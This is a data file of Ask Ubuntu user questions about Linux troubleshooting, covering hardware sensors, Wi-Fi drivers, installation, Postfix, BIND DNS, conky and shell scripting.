464091	ati gpu temp sensor failed ? lm90 fail	i currently use old laptop with ati radeon x1400 graphics card and lm-sensors shows `` 0 '' temperature : aftersudo sensors-detect $ sensors adm1032-i2c-2-4c adapter : radeon i2c bit bus 0x92 temp1 : +0.0°c ( low = +0.0°c , high = +0.0°c ) ( crit = +0.0°c , hyst = +0.0°c ) temp2 : +0.0°c ( low = +0.0°c , high = +0.0°c ) ( crit = +0.0°c , hyst = +0.0°c ) i figured out that responsible for temperature hardware/module is lm90 $ dmesg | grep lm90 [ 20652.154246 ] lm90 2-004c : register 0x19 read failed ( -6 ) [ 20652.155315 ] lm90 2-004c : register 0x21 read failed ( -6 ) [ 20652.156399 ] lm90 2-004c : register 0x0 read failed ( -6 ) [ 20652.157461 ] lm90 2-004c : register 0x1 read failed ( -6 ) [ 20652.158523 ] lm90 2-004c : register 0x8 read failed ( -6 ) [ 20652.159592 ] lm90 2-004c : register 0x7 read failed ( -6 ) [ 20652.160687 ] lm90 2-004c : register 0x11 read failed ( -6 ) [ 20652.161749 ] lm90 2-004c : register 0x2 read failed ( -6 ) [ 20652.162815 ] lm90 2-004c : register 0x3 read failed ( -6 ) [ 20701.916440 ] lm90 2-004c : register 0x6 read failed ( -6 ) [ 20701.917521 ] lm90 2-004c : register 0x5 read failed ( -6 ) [ 20701.918892 ] lm90 2-004c : register 0x20 read failed ( -6 ) [ 20701.919959 ] lm90 2-004c : register 0x19 read failed ( -6 ) [ 20701.921119 ] lm90 2-004c : register 0x21 read failed ( -6 ) [ 20701.922214 ] lm90 2-004c : register 0x0 read failed ( -6 ) [ 20701.923312 ] lm90 2-004c : register 0x1 read failed ( -6 ) [ 20701.924430 ] lm90 2-004c : register 0x8 read failed ( -6 ) [ 20701.925510 ] lm90 2-004c : register 0x7 read failed ( -6 ) [ 20701.926581 ] lm90 2-004c : register 0x11 read failed ( -6 ) [ 20701.927658 ] lm90 2-004c : register 0x2 read failed ( -6 ) [ 20701.929123 ] lm90 2-004c : register 0x3 read failed ( -6 ) is it caused by using open source drivers ( fglrx not support x1400 since v9.4 ) or by failing lm90 ? and after all what that errors `` read failed '' mean ( could n't find anything interesting ) ?
464092	how do i get the wireless working on a dell latitude e5400 ?	i have got a dell latitude e5400 , it runs under ubuntu 14.04 and wlan does not work . is there a driver for wlan for this laptop ? i am new to ubuntu . how can i get wireless working on this laptop ?
464094	mouse cursor does n't show globally	i tried installing a mouse cursor theme , and anytime i try and click on any mouse theme , it does n't show everywhere . if i put the mouse on the launcher it it dmz-black . if it 's in firefox , it 's the theme i selected . when i try sudo update-alternatives -- config x -- cursor-theme it does n't show my folder .
464098	software center not loading with gtk-warning 's	recently i have noticed that i can not launch the software center , from either the launcher or the terminal . i have combed over numerous posts about what to do so far with no results . i have tried : sudo apt-get remove software-center sudo apt-get autoremove software-center with no results . i have updated the sources list by fixing the /etc/apt/sources.list file then running : sudo apt-get update with no results . i get the following errors ( i will list only one of each because it seems redundant to post them all ) when trying to launch software-center : > > ( software-center:15952 ) : gtk-warning ** : theme parsing error : nautilus.css:144:23 : 'px ' is not a valid color name > > ( software-center:15952 ) : gtk-warning ** : theme parsing error : unity.css:11:24 : 'px ' is not a valid color name > > gtk-warning ** : theme parsing error : gtk-widgets.css:2481:23 : 'px ' is not a valid color name i think this all started happening when an upgrade package was trying to install , and i was getting all kinds of errors because there were 'untrusted packages ' from plymouth .
464099	how to generate a strong key for ssh encryption ?	i recently setup my first ubuntu server , it 's 14.04 , and i 'm trying to secure ssh . i 've googled around for numerous guides and there are many good ones that go into great detail about how to setup a private/public key pair so that you can safely log in to your server . if i 'm correct i believe these keys only handle authentication and i 'm interested in trying to setup strong encryption for ssh . i believe when the ssh server is installed the keys for encryption are placed in /etc/ssh under names like ssh_host_*_key . assuming everything i 've said so far is correct i have two questions : why are there 4 keys ? the files seem to be named after different key generation algorithms but i 'm not sure why you would n't choose an approach and only have the one key that corresponded to that approach . are all used ? is there a way to specify which is used ? are the default generated keys secure ? when i was making the authentication keys i read much about how some algorithms were secure and some were not . should i regenerate these encryption keys somehow using a certain set of parameters ? i know i 'm noob , thank you for helping to educate me .
464104	why is terminal telling me that my .rar file is not a rar archive ?	the file was downloaded online am i am trying to get a ps2 emulator working on my computer for fun . all i need to do now is learn how to open this rar file . file output of : superpajamarama @ : ~ $ file `` /home/superpajamarama/desktop/ps2 games/futurama.rar '' /home/superpajamarama/desktop/ps2 games/futurama.rar : empty this is what the terminal says when trying to unrar : superpajamarama : ~ $ unrar x /home/superpajamarama/desktop/ps2 games/futurama.rar unrar 5.00 beta 8 freeware copyright ( c ) 1993-2013 alexander roshal /home/superpajamarama/desktop/ps2 games/futurama.rar is not rar archive no files to extract
464106	is it possible to install 14.04 with 1gb flash stick ?	ok , i would like to install ubuntu 14.04 . i have 1 gb flash stick and am unable to make it bootable with unetbootin , because i need like extra 5 mb . is there anyway that i can install by not using wubi method or dvds ? what about downloading 12.04 and upgrading it to 14.04 ? it is a good idea ?
464110	how to get terminal in trusty to show screen dimensions while being resized as per precise	in precise , when you clicked and held left mouse button down while on the windows edge , it would pop up a little box in the centre of the terminal window showing the current screen dimensions as columns x rows . as you resized the terminal screen , it would show you the new size so you could easily get the exact screen dimensions you need . this is very useful if you are running an older character based app which needs specific screen dimensions . i know you can change the screen size in the profile preferences and when you open a new terminal window in the default profile , it will open to the defined screen size , but if you often change screen sizes , it is a pain to have to open a new terminal window to get back to the dimensions you need . the little box showing columns x rows is not appearing at all in my new trusty vm .
464111	what does the installer download during the installation process ?	'' connecting this computer to a wi-fi network allows you to install third party software , download updates , automatically detect your timezone , and install full support for your language . '' -the lubuntu installer what specifically is n't included on a lubuntu 13.10 x86-64 installation iso that the installer downloads from the internet during the installation process ? i find the installer 's description to be vague , and would like to either find or make a more detailed list . specific package , or file names would be helpful . my list thus far : third party software : mp3 support [ do n't know what packages or files specifically ] some network drivers depending on users hardware updates : updates published since the iso was released [ not sure if this includes kernel updates ] full support for your language : ? unknown category grub2 uefi support [ do n't know specifically what packages or files ]
464112	ubuntu desktop 14.04 fresh install is slow/freezing	i installed ubuntu for the first time today . i dual booted with windows 7 . windows works just fine , and ubuntu will load just fine in a timely manner . the problem is the desktop seems slow , my mouse has like a 10 second delay when i move it , making it impossible to really do anything . the first time my screen went all frizzy making me think that this could be a graphics driver issue . sometimes it does n't even boot up , the screen freezes with a bunch of white dots on the screen . after several tries , now it does n't even boot up anymore . i 'm completely new to ubuntu and trying to learn my way around it . any ideas on how i can get it working properly ?
464116	trusty tahr & rdp	i 'm looking for a way to rdp into 14.04 using the unity desktop environment . i 've successfully been able to rdp into 14.04 using the mate , and xfce desktop environment , but to be honest i do n't care much for either . i 've become accustomed to the unity interface so i 'd like to stick with it . i 've tried to load the unity 2d environment using synaptic , but i do n't have the option to select a 2d desktop during login , which is what is required for unity to work ( if the option is not available on login , it wo n't be available for rdp ) ... .at least that 's what worked for me when running precise . any suggestions ? system : asus cm 6870 , i7 , 64 bit architecture , 16 gb ddr3 , 4 tb hd
464119	problem with installing ubuntu over win8	i am trying to install ubuntu on disk/partition where i had win8 . first image is partition with win8 . i deleted all partition except last two with data ( sda5 and sda6 ) and created partition for ubuntu . i installed ubuntu and all went fine but when i try to boot it i get bios saying select boot device . when i choose only disk i have in machine ubuntu boots . i really do n't know why ubuntu did n't use sda2 to create boot partition . i know there are two options for boot ( mbr or bios_grub ) . if i got that right . i found few instructions how to create partitions for ubuntu but all are different . like everybody has their own way . i know very little about linux and any help and advice is appreciated . image 1 http : //i61.tinypic.com/snnlms.jpg image 2 http : //i59.tinypic.com/w6v394.jpg
464127	problem installing 14.04 : ca n't get installer to start	i am trying to install ubuntu 14.04 from usb and i followed the instructions , but after i chose to which drive to install ubuntu , when 'install now ' button is clicked , there is no response , even after 2 hours ! please help . thank you !
464128	will the ( non-mac ) xubuntu installation dvds boot on intel macs ?	in the context of the ubuntu ( not xubuntu ) installation dvds , it 's been stated repeatedly that the developers could n't create one dvd that would boot on both intel mac and non-mac systems . on the other hand , it 's been claimed that the installation dvds for xubuntu will work with both intel mac and other systems . is one of these claims incorrect ? will the xubuntu installation dvd boot on intel macs without any problems ?
464130	i have just one big partition with windows loader in it ... how to install ubuntu alongside windows in that case ?	i want to install ubuntu on an old windows vista laptop . i need to maintain the vista ( yes , i know , it sucks ) , so i decided to create a partition alongside while installing it . but i do n't know what to do after i select `` something else '' . the next screen shows the partition list : /dev/sda /dev/sda1 ntfs size:1572 mb used:145 mb /dev/sda2 ntfs size:198475 mb used : unknown windows vista ( loader ) and that 's all i 've got there . if i select /dev/sda and then click `` new partition table ... '' i get this message that says `` you have selected an entire device to partition . if you proceed with creating a new partition table on the device , then all current partitions will be removed '' . i do n't want to remove all partitions ... but i just have the windows loader as the big partition that has almost the whole disk . what should i do ? i 've installed ubuntu before and other windows machine , but in the first case i did have some free allocated space ... i do n't know how to manage this , when i 've read that you should not touch the windows loader partition ...
464134	creating an ubuntu server vm on ubuntu server	i 'm having a lot of trouble trying to set up a vm on ubuntu server . i 've tried following multiple guides like this one but right now , no matter what i try , i ca n't create a br0 instance . before that , i tried using cloudmin to make one . that worked fine until i rebooted one time and kvm became corrupted and rendered my vm unusable . i 've tried doing it with virt-manager using another computer running ubuntu but that did n't work either . what i 'm asking is , is there an easy-to-do , up-to-date guide for ubuntu server 14.04 ? or is there some other os that makes making vms easier and actually works ?
464136	leftover efi files in hidden partition	so i have tried to install linux ( unsuccessfully ) multiple times and when i run diskutil list , i get this : disk1 is my usb and disk0 is my hard drive ( which is flash storage if that makes a difference ) and i am running osx 10.9.2 . when i go to disk utilities it does n't show the efi partition and i have tried completely erasing my usb but this efi partition is still there . will this interfere with if i try to install linux again and how do i delete it ?
464139	apt does n't update mplayer2	i had mplayer2 from 13.04 repositories . now i added motumedia ppa for it : sudo add-apt-repository ppa : motumedia/mplayer-daily but while current mplayer2 is 2.0-554-gf63dbad-1ubuntu1 and motumedia/mplayer-daily has 2.1~git20121109.28274-1~raring1 it does n't upgrade ! here is the output of apt-cache policy mplayer2 : mplayer2 : installed : 2.0-554-gf63dbad-1ubuntu1 candidate : 2.0-554-gf63dbad-1ubuntu1 version table : *** 2.0-554-gf63dbad-1ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/universe amd64 packages 100 /var/lib/dpkg/status edit1 : i did sudo apt-get update but weirdly that ppa is not present in listing of upgrade output while it exists in /etc/apt/sources.list.d/ : $ ll /etc/apt/sources.list.d/motumedia-mplayer-daily-raring.list -rw-r -- r -- 1 root root 150 may 11 05:41 /etc/apt/sources.list.d/motumedia-mplayer-daily-raring.list and $ cat /etc/apt/sources.list.d/motumedia-mplayer-daily-raring.list deb http : //ppa.launchpad.net/motumedia/mplayer-daily/ubuntu raring main # deb-src http : //ppa.launchpad.net/motumedia/mplayer-daily/ubuntu raring main edit2 : and it gets more strange when i run apt-cache policy|grep motumedia : 500 http : //ppa.launchpad.net/motumedia/mplayer-daily/ubuntu/ raring/main i386 packages release v=13.04 , o=lp-ppa-motumedia-mplayer-daily , a=raring , n=raring , l=mplayer daily builds , c=main 500 http : //ppa.launchpad.net/motumedia/mplayer-daily/ubuntu/ raring/main amd64 packages release v=13.04 , o=lp-ppa-motumedia-mplayer-daily , a=raring , n=raring , l=mplayer daily builds , c=main edit3 : apt-cache show mplayer2/motumedia-mplayer-daily says : e : release 'motumedia-mplayer-daily ' for 'mplayer2 ' was not found e : no packages found what is the problem ?
464141	ca n't resume from suspend in ubuntu 14.04 64bit	hi everyone first thing is that i got a problem when i suspend the pc , it suspends like a normal pc but when i try to resume that 's when i get the problem ... . i ca n't resume , the pc turns on but in the screen theres no signal only blackscreen here my pc specs . pc specs : video card : amd radeon hd 6480m discrete-class ram : ddr3 de 4 gb microprocessor : 2.5 ghz vision a4 technology from amd with amd dual-core a4-3310mx accelerated processor display : 35,5 cm ( 14,0 '' ) high-definition led hp brightview display ( 1366 x 768 ) hard drive : 500 gb sata ( 5400 rpm ) if need more specs , please advise me . http : //h10025.www1.hp.com/ewfrf/wc/document ? docname=c02901644 & cc=us & destpage=document & lc=en & product=5113863 & tmp_docname=c02905502 ps : i know , i saw other posts but i was unsure if those methods were going to work in ubuntu 14.04lts 64bit
464142	how to install x11 xevie extension to compile xevie-based programs	is there a command to install xevie ( for x11 programming ) from repository ? ( so that xevie.h will be available for programming ) i need it to compile this sample in qt creator : /* xeviedemo.c */ # include < stdio.h > # include < stdlib.h > # include < unistd.h > # include < x11/xlib.h > # include < x11/xproto.h > # include < x11/x.h > # include < x11/extensions/xevie.h > # include < x11/xutil.h > static void print_key_event ( xevent *ev ) { xkeyevent *key_ev ; char buffer [ 20 ] ; int bufsize = 19 ; keysym key ; xcomposestatus compose ; int char_count ; key_ev = ( xkeyevent * ) ev ; printf ( `` state : % x keycode : % x\n '' , key_ev- > state & shiftmask , key_ev- > keycode ) ; char_count = xlookupstring ( key_ev , buffer , bufsize , & key , & compose ) ; buffer [ char_count ] = '\0 ' ; printf ( `` char count : % d keysym : % x char : | % c|\n '' , char_count , key , buffer [ 0 ] ) ; } int main ( int argc , char **argv ) { display *dpy ; int major , minor ; xevent event ; xclientmessageevent *xcme ; int count = 0 ; long delay = 0 ; int ret ; if ( argc > 2 ) { printf ( `` usage : xeviedemo delay ( in milliseconds ) \n '' ) ; exit ( 1 ) ; } else if ( argc == 2 ) { delay = strtol ( argv [ 1 ] , 0 , 0 ) ; } printf ( `` delay is % d milliseconds\n '' , delay ) ; delay *= 1000 ; dpy = xopendisplay ( null ) ; xeviequeryversion ( dpy , & major , & minor ) ; printf ( `` major = % d , minor = % d\n '' , major , minor ) ; if ( xeviestart ( dpy ) ) printf ( `` xeviestart ( dpy ) finished \n '' ) ; else { printf ( `` xeviestart ( dpy ) failed , only one client is allowed to do event interception\n '' ) ; exit ( 1 ) ; } xevieselectinput ( dpy , keypressmask | keyreleasemask | buttonpressmask | buttonreleasemask | pointermotionmask ) ; while ( 1 ) { xnextevent ( dpy , & event ) ; xcme = ( xclientmessageevent * ) & event ; /* for readonly users , send events back to xserver immediately */ printf ( `` ( % 4d ) '' , count++ ) ; switch ( event.type ) { case keypress : usleep ( delay ) ; printf ( `` keypress\n '' ) ; print_key_event ( & event ) ; break ; case keyrelease : printf ( `` keyrelease\n '' ) ; break ; case buttonpress : usleep ( delay ) ; printf ( `` buttonpress\n '' ) ; break ; case buttonrelease : printf ( `` buttonrelease\n '' ) ; break ; case motionnotify : printf ( `` motionnotify\n '' ) ; break ; case clientmessage : printf ( `` clientmessage : < % s > \n '' , & xcme- > data.b [ 1 ] ) ; break ; default : printf ( `` unknown event % x\n '' , event.type ) ; break ; } xeviesendevent ( dpy , & event , xevie_unmodified ) ; if ( count > 10000 ) { break ; } } xevieend ( dpy ) ; printf ( `` xevieend ( dpy ) finished \n '' ) ; exit ( 0 ) ; }
464143	ubuntu 14.04 razer taipan side buttons not functioning correctly	i just recently purchased a razer taipan mouse that has 4 side buttons that i can use . after checking the button inputs in xinput , the two left side buttons are interpreted as button 8 and 9 . but the problem is the right side buttons are also interpreted as 8 and 9 . how can i reassign the two right side buttons to be separate input buttons ?
464146	how to enable icons in menus in ubuntu 14.04	in previous ububtu releases i could enable icons in menus via several tweak tools , or via the gnome config editor . all of these options have disappeared or have no effect in 14.04 . takes me 20 times longer to find the menu item i want now , rather than the previous split-second to spot the colourful icon . : )
464153	postfix sends but not receives mail	i have a postfix server that sends but does n't receive mail , here 's the config : # see /usr/share/postfix/main.cf.dist for a commented , more complete version # debian specific : specifying a file name will cause the first # line of that file to be used as the name . the debian default # is /etc/mailname . # myorigin = /etc/mailname smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no # appending .domain is the mua 's job . append_dot_mydomain = no # uncomment the next line to generate `` delayed mail '' warnings # delay_warning_time = 4h readme_directory = no # tls parameters smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . myhostname = cheesecakebb.org alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases mydestination = cheese-ubuntu , localhost.localdomain , localhost cheesecakebb.org mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_size_limit = 100000 recipient_delimiter = + inet_interfaces = all default_transport = smtp relay_transport = smtp inet_protocols = all myorigin = /etc/mailname relayhost = error log : may 4 08:00:34 cheese-ubuntu postfix/pickup [ 18114 ] : 80c2660649 : uid=0 from= < root > may 4 08:00:34 cheese-ubuntu postfix/cleanup [ 19043 ] : 80c2660649 : message-id= < 20140504120034.80c2660649 @ cheese-ubuntu > may 4 08:00:34 cheese-ubuntu postfix/qmgr [ 1418 ] : 80c2660649 : from= < root @ cheese-ubuntu > , size=462 , nrcpt=1 ( queue active ) may 4 08:00:34 cheese-ubuntu postfix/local [ 19045 ] : 80c2660649 : to= < root @ cheese-ubuntu > , orig_to= < root > , relay=local , delay=0.11 , delays=0.09/0/0/0.02 , dsn=2.0.0 , status=sent ( delivered to mailbox ) may 4 08:00:34 cheese-ubuntu postfix/qmgr [ 1418 ] : 80c2660649 : removed may 8 17:30:15 cheese-ubuntu postfix/master [ 1205 ] : daemon started -- version 2.9.6 , configuration /etc/postfix may 8 17:33:40 cheese-ubuntu postfix/master [ 1205 ] : reload -- version 2.9.6 , configuration /etc/postfix may 8 17:33:40 cheese-ubuntu postfix/master [ 1205 ] : reload -- version 2.9.6 , configuration /etc/postfix may 8 17:35:12 cheese-ubuntu postfix/master [ 1205 ] : reload -- version 2.9.6 , configuration /etc/postfix may 8 17:35:45 cheese-ubuntu postfix/master [ 1205 ] : reload -- version 2.9.6 , configuration /etc/postfix may 9 02:38:41 cheese-ubuntu postfix/master [ 1205 ] : reload -- version 2.9.6 , configuration /etc/postfix may 9 02:38:41 cheese-ubuntu postfix/master [ 1205 ] : reload -- version 2.9.6 , configuration /etc/postfix may 9 10:24:39 cheese-ubuntu postfix/master [ 1228 ] : daemon started -- version 2.9.6 , configuration /etc/postfix may 9 10:28:06 cheese-ubuntu postfix/master [ 1228 ] : reload -- version 2.9.6 , configuration /etc/postfix may 9 10:28:06 cheese-ubuntu postfix/master [ 1228 ] : reload -- version 2.9.6 , configuration /etc/postfix may 10 01:54:52 cheese-ubuntu postfix/pickup [ 21395 ] : 55da260665 : uid=0 from= < gage @ cheese-ubuntu > may 10 01:54:52 cheese-ubuntu postfix/cleanup [ 25864 ] : 55da260665 : message-id= < 1399701292.25794 @ cheese-ubuntu > may 10 01:54:52 cheese-ubuntu postfix/qmgr [ 2582 ] : 55da260665 : from= < gage @ cheese-ubuntu > , size=576 , nrcpt=1 ( queue active ) may 10 01:54:52 cheese-ubuntu postfix/error [ 25870 ] : 55da260665 : to= < loytd321 @ gmaiil.com > , relay=none , delay=0.13 , delays=0.1/0/0/0.03 , dsn=5.0.0 , status=bounced ( gmaiil.com ) may 10 01:54:52 cheese-ubuntu postfix/cleanup [ 25864 ] : 71f3b60694 : message-id= < 20140510055452.71f3b60694 @ cheese-ubuntu > may 10 01:54:52 cheese-ubuntu postfix/bounce [ 25871 ] : 55da260665 : sender non-delivery notification : 71f3b60694 may 10 01:54:52 cheese-ubuntu postfix/qmgr [ 2582 ] : 71f3b60694 : from= < > , size=2243 , nrcpt=1 ( queue active ) may 10 01:54:52 cheese-ubuntu postfix/local [ 25872 ] : 71f3b60694 : to= < gage @ cheese-ubuntu > , relay=local , delay=0.11 , delays=0.05/0.05/0/0.01 , dsn=2.0.0 , status=sent ( delivered to mailbox ) may 10 01:54:52 cheese-ubuntu postfix/qmgr [ 2582 ] : 55da260665 : removed may 10 01:54:52 cheese-ubuntu postfix/qmgr [ 2582 ] : 71f3b60694 : removed may 10 01:55:48 cheese-ubuntu postfix/pickup [ 21395 ] : 3278e60665 : uid=0 from= < gage @ cheese-ubuntu > may 10 01:55:48 cheese-ubuntu postfix/cleanup [ 25864 ] : 3278e60665 : message-id= < 1399701348.26042 @ cheese-ubuntu > may 10 01:55:48 cheese-ubuntu postfix/qmgr [ 2582 ] : 3278e60665 : from= < gage @ cheese-ubuntu > , size=576 , nrcpt=1 ( queue active ) may 10 01:55:48 cheese-ubuntu postfix/error [ 25870 ] : 3278e60665 : to= < loytd321 @ gmail.com > , relay=none , delay=0.09 , delays=0.07/0/0/0.02 , dsn=5.0.0 , status=bounced ( gmail.com ) may 10 01:55:48 cheese-ubuntu postfix/cleanup [ 25864 ] : 45c826070d : message-id= < 20140510055548.45c826070d @ cheese-ubuntu > may 10 01:55:48 cheese-ubuntu postfix/bounce [ 25871 ] : 3278e60665 : sender non-delivery notification : 45c826070d may 10 01:55:48 cheese-ubuntu postfix/qmgr [ 2582 ] : 45c826070d : from= < > , size=2239 , nrcpt=1 ( queue active ) may 10 01:55:48 cheese-ubuntu postfix/local [ 25872 ] : 45c826070d : to= < gage @ cheese-ubuntu > , relay=local , delay=0.07 , delays=0.05/0/0/0.01 , dsn=2.0.0 , status=sent ( delivered to mailbox ) may 10 01:55:48 cheese-ubuntu postfix/qmgr [ 2582 ] : 3278e60665 : removed may 10 01:55:48 cheese-ubuntu postfix/qmgr [ 2582 ] : 45c826070d : removed may 10 01:56:32 cheese-ubuntu postfix/pickup [ 21395 ] : 0934560665 : uid=0 from= < gage @ cheese-ubuntu > may 10 01:56:32 cheese-ubuntu postfix/cleanup [ 25864 ] : 0934560665 : message-id= < 1399701391.26183 @ cheese-ubuntu > may 10 01:56:32 cheese-ubuntu postfix/qmgr [ 2582 ] : 0934560665 : from= < gage @ cheese-ubuntu > , size=579 , nrcpt=1 ( queue active ) above is the error log , however , it does n't make much sense to me as i am new to the postfix part of linux
464155	kernel panic error while installing minimal cd	i recently created a bootable usb of ubuntu 14.04 minimal cd using the disk destroyer . when i boot , i have the options - install , advanced install , command line install & help . clicking on any of the install options shows this error : kernel panic-not syncing : vfs : unable to mount root fs on unknown block ( 0,2 ) note- the md5check was correct . the usb was full formatted to fat32 prior to the installation via dd . i 'm currently using porteus 3.0 as my os . i tried installing using unetbootin , but it did n't work . i have checked other forums , and the solutions said something about grub or updating the kernel . since i 'm new to linux , i 'm not familiar with any of those terms . so a detailed answer would really be helpful . thanks !
464156	typed `` yes , do as i say ! `` , need to repair now	running ubuntu 12.04 . i was trying to install something , but i guess i did n't get the dependencies installed . i had a red circle in the top right near the clock , told me to run sudo apt-get or something . when i did , i had some option to remove some stuff and have new stuff installed . i typed `` yes , do as i say ! '' to confirm , and noticed all my apps on the left side task bar were disappearing . i tried to stop it by holding the power button down . now when i power up , i can log in , but there 's just a desktop , no apps on the left , and no menu ( ? ) bar with the clock and stuff on top . the files and folders on the desktop have no text under them either . is there anyway i can repair this ? maybe just reinstall everything ?
464162	bluetooth earphones jabra rox wireless not recognized under ubuntu 14.04	i would like to connect my bluetooth ( 4.0 ) earphones ( jabra rox wireless ) with my lenovo x1 carbon laptop running ubuntu 14.04 . if i activate bluetooth , set it to visible and start pairing mode on the earphones , no device is found . is there any software i can install or how can i figure out what is missing ? the earphones pair immediately with my android phone .
464163	ubuntu dns server working , but getting errors in syslog	it 's my first question to the forum here , so please go easy on me . i 'm a linux newbie and i experimented with setting up my own ubuntu server ( server name : araliya , domain : autun.hom , ip : 192.168.1.99 ) . i setup everything and installed bind9 to setup a dns server using the tutorial posted here ( how do i do a complete bind9 dns server configuration with a hostname ? ) . everything went actually very well , until the step at the very end , when i had to check whether the dns server is working . when i gave the following command , i got a good output . > named-checkzone autun.hom /etc/bind/zones/db.autun.hom zone autun.hom /in : loaded serial 2 ok however , when i did the same thing for my reverse dns lookup i got a slightly different answer . > named-checkzone autun.hom /etc/bind/zones/db.192 zone autun.hom /in : loaded serial 1 ok the tutorial said that the output of `` named-checkzone '' should be the same for forward and reverse lookup zones . but the `` loaded serial '' value i get is different between the two answers . when i followed all the other tests including , dig , hostname , nslookup , i get good output . in fact , my dns server looks like it 's working . when i checked the syslog , however , i get lots of errors : may 10 20:09:04 araliya named [ 1026 ] : validating @ 0x7f1314706200 : . ns : got insecure response ; parent indicates it should be secure may 10 20:09:04 araliya named [ 1026 ] : error ( insecurity proof failed ) resolving './ns/in ' : 192.168.1.1 # 53 may 10 20:09:12 araliya named [ 1026 ] : validating @ 0x7f1314706200 : . ns : got insecure response ; parent indicates it should be secure may 10 20:09:12 araliya named [ 1026 ] : error ( insecurity proof failed ) resolving './ns/in ' : 192.168.1.1 # 53 may 10 20:09:13 araliya named [ 1026 ] : error ( network unreachable ) resolving './ns/in ' : 2001:7fe : :53 # 53 may 10 20:09:24 araliya named [ 1026 ] : validating @ 0x7f1314706200 : . ns : got insecure response ; parent indicates it should be secure may 10 20:09:24 araliya named [ 1026 ] : error ( insecurity proof failed ) resolving './ns/in ' : 192.168.1.1 # 53 the weird thing is that all hostnames are being resolved correctly but it looks like i may have made a mistake somewhere . can someone help me pinpoint where the error is ?
464164	grub rescue and low graphics mode problems	i have a dell inspiron 15r 5537 , dual-booted with windows 8 and ubuntu 14.04 . whenever i install a new software or update an existing one , i get the following errors . grub rescue ubuntu is running in low graphics mode . i dont know what the problem is and i 'm not able to rectify it . please help .
464165	using a keyboard shortcut to execute a script	hello i am a linux newbie trying to set up a keyboard shortcut to execute a script i have . the script functions as desired , and is # ! /bin/bash livestreamer twitch.tv/arteezy best this opens up vlc player to watch a live stream of a game . now , i want to make it even easier and use ctrl+shift+z ( or whatever ) to open up the script . i have the script located in /home/username/livestreamer/arteezyhigh.sh so i go to the `` custom shortcuts '' area and add a new shortcut . in the command area i tried putting the location , but it did not run the script . i tried some version of -gnome -e `` livestreamer twitch.tv/arteezy best '' to run the terminal with the command , this did not work either . i am not sure what i am missing , and would like to be able to open the stream using a custom hotkey . thanks for the help .
464166	how do i get a sensors output in conky ?	i am trying to use conky to display my sensors output but have no idea where to start . i 've seen other scripts and they dont make any seance to me . i 've tried a few scripts here and there but none seem to work with mine . my sensors output is as follows . acpitz-virtual-0 adapter : virtual device temp1 : +48.0°c ( crit = +110.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +49.0°c ( high = +80.0°c , crit = +85.0°c ) core 0 : +49.0°c ( high = +80.0°c , crit = +85.0°c ) core 1 : +44.0°c ( high = +80.0°c , crit = +85.0°c ) the conky im using is as follows : text $ { color # 42ae4a } processes : $ { color lightgrey } $ processes $ { color # 42ae4a } run : $ { color lightgrey } $ running_processes $ { color # 42ae4a } $ { color # 42ae4a } core 1 temp : $ { color lightgrey } $ { exec sensors | grep 'core0 ' } $ { color # 42ae4a } core 2 temp : $ { color lightgrey } $ { exec sensors | grep 'core1 ' } the ui output is seen here i do n't know much about conky scripting , anything helps . and please do n't just suggest trying scripts until one works . i rather learn what i 'm doing then copy a script . having said that , the above script is actually copyed and i have no idea what exec means or does , but i assume it stands for execute . edit : changed the last two lines in conky to : $ { color # 42ae4a } core 0 temp : $ { color lightgrey } $ { exec sensors | grep 'core 0 ' } $ { color # 42ae4a } core 1 temp : $ { color lightgrey } $ { exec sensors | grep 'core 1 ' } now the output is as follows :
464167	move files and auto rename if same name | bash script find all *.extension	something like `` -- auto '' in : http : //doc.bazaar.canonical.com/beta/en/user-reference/mv-help.html it seems a bit complicated to -- no-clobber ( -n ) and work on return codes if [ $ ? -eq 1 ] ; then some_function $ line ... $ line is the absolute file path . here is the script i am trying to write : # ! /bin/bash # searches by filetype extension # writes find results to search_output # reads lines of search_output and echo/cp/mv to current folder # run as sudo to also search hidden folders echo `` choose operation by entering number : ( 0 : echo , 1 : cp , 2 : mv ) '' read index cmd [ 0 ] ='echo' cmd [ 1 ] ='cp -l' cmd [ 2 ] ='mv -i' echo `` enter filetype extension ( i.e .pdf , .jpg , .csv , ... ) : '' read file_extension echo `` enter directory path ( /path/to/search/in ) : '' read fp echo `` searching for : `` echo `` * $ file_extension files\n '' echo `` searching recursively starting : `` echo `` $ fp '' # clear file echo `` '' > search_output find `` $ fp '' -iname `` * $ file_extension '' -fprint search_output while read line ; do eval $ { cmd [ $ index ] } ' $ line ' . ; done < search_output echo `` files found : `` wc -l search_output | cut -d ' ' -f 1 posts looked at : how to move all files in current folder to subfolder ? how can i move all files in subdirectories recursively to a single directory ? move files from one folder to another with same name
464169	how do i install flashtool 0.91 on ubuntu 14.04 lts ?	http : //www.flashtool.net/download.php try to give me a guide or something ( with pictures or a video if possible )
464172	unable to upgrade to 14.04 from 12.04	i just bought a new hp laptop that runs ubuntu 12.04 . the current ubuntu version is 14.04 and i wanted to upgrade to it . after starting up my laptop for the first time , i headed to the update manager . there were about 470 updates ( security ones ) and one for ubuntu 12.10 . how can the update for 12.10 still be available when support to it has ended ? i started the update , but unfortunately due to a really slow internet connection , i was n't able to complete it . meanwhile , i did have a trusty tahr dvd , which i suspect was not fully complete ( the size was only 470 mb as compared to 900 mb which i read on a blog ) . so , i stopped the update and ran the dvd , which again unfortunately did not boot up . i checked if the dvd was correct and gong by the ubuntu forums , i should have booted up . the dvd was quite proper ( the files and folders were as it should be and the iso image was burned properly ( using disk startup ) ) . so , after all of this , with all options exhausted , i tried to use the update manager . the 470 updates showed , but the system asked for a partial update . i did do that too , but it stopped halfway , asked me to insert the trusty tahr dvd . please help . i am pretty new to unpbuntu and do n't really understand what to do now .
464173	how can i programmatically determine which files are currently open in evince ?	i have opened a pdf file with the document viewer from the gui . is there any way to get the path of this file in a terminal/script ?
